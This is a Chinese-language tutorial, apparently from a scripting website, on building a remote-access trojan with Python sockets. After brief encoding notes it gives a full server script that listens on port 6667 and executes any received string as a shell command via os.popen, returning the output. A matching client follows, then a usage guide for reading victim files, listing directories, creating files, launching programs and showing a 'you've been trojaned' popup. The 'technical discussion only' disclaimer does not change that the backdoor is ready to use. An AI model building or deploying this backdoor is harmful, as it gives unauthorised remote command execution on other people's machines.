嚴(yán)正聲明：本文僅限于技術(shù)討論，嚴(yán)禁用于其他用途。

基礎(chǔ)知識

• socket通信模塊：針對TCP/IP協(xié)議簇進(jìn)行的程序封裝，在Windows/Linux均有這樣底層模塊。
• Unicode 有多種存儲方式，常見的有 UTF-8、UTF-16、UTF-32，它們分別用不同的二進(jìn)制格式來表示 Unicode 字符
• 如果全部英文或英文與其他文字混合,但英文占絕大部分,用UTF-8就比UTF-16節(jié)省了很多空間.而如果全部是中文這樣類似的字符或者混合字符中中文占絕大多數(shù).UTF-16就占優(yōu)勢了,可以節(jié)省很多空間

編碼：

• 英文多：建議用UTF-8編碼（utf-8是使用最多的編碼方式，是一種變長字符編碼）
• 中文多：建議用UTF-16編碼
• 中文：window中文采用的是GBK格式編碼

netstat -ant ：只顯示傳輸層的數(shù)據(jù) TCP，UDP連接，可以用來檢查socket服務(wù)是否起了

服務(wù)端(server)程序

import socket, os
def attack():
    try:
        s = socket.socket()
        s.bind(('0.0.0.0', 6667)) #   使用缺省地址，所有設(shè)備均可訪問該服務(wù)器的6667端口
        s.listen()     #    對6667端口進(jìn)行監(jiān)聽
        chanel, client = s.accept() #   進(jìn)入阻塞狀態(tài)，accept() 返回元組，接受來自客戶端的數(shù)據(jù)，chanel:新的socket對象用于標(biāo)識出服務(wù)器和哪個客戶端連接進(jìn)行通信，  client: 客戶端的IP和端口
        while True:
            receive = chanel.recv(1024).decode()
            reply = os.popen(receive).read()
            chanel.send(f"命令{receive}的運行結(jié)果:\n{reply}".encode())
    except:
        s.close()
        attack()
if __name__ == '__main__':
    attack()

客戶端(client)程序

import socket
s = socket.socket()
s.connect(('192.168.137.1', 6667))	#192.168.137.1是socket服務(wù)器的地址
while True:
    sendstr = input("請輸入消息：")
    s.send(sendstr.encode())
    receive = s.recv(1024).decode()
    print(f"服務(wù)器回復(fù)：{receive}")
    # s.close()

其他命令執(zhí)行函數(shù)

提示：需要導(dǎo)入 os 模塊—— import os

os.system('ipconfig')

os.popen('ipconfig').read()

eval()        # 將字符串按照Python代碼來執(zhí)行

該木馬程序的基本用法

1、查看文件內(nèi)容

window

type 文件絕對路徑

linux

cat 文件路徑

2、查看文件目錄

window

dir                #查看當(dāng)前文件路徑目錄
dir 文件路徑     #查看指定文件路徑目錄

linux

ls                #查看當(dāng)前文件路徑目錄
ll                #查看當(dāng)前文件路徑目錄詳細(xì)信息
ls 文件路徑         #查看指定文件路徑目錄
ll 文件路徑         #查看指定文件路徑目錄詳細(xì)信息

3、創(chuàng)建文件或目錄

windows

echo test >> demo.txt    #創(chuàng)建一個demo.txt文件，文件內(nèi)容為 test

linux

mkdir 路徑    #創(chuàng)建目錄
echo test >> demo.txt    #創(chuàng)建一個demo.txt文件，文件內(nèi)容為 test

4、調(diào)用windows應(yīng)用程序

調(diào)用計算器

calc.exe

調(diào)用其他引用程序

直接輸入應(yīng)用程序絕對路徑

5、調(diào)用Windows彈窗

echo msgbox("你中木馬了！！")  > E:\hi.vbs    
E:\hi.vbs

到此這篇關(guān)于Python Socket實現(xiàn)遠(yuǎn)程木馬彈窗詳解的文章就介紹到這了,更多相關(guān)Python Socket內(nèi)容請搜索腳本之家以前的文章或繼續(xù)瀏覽下面的相關(guān)文章希望大家以后多多支持腳本之家！

最新評論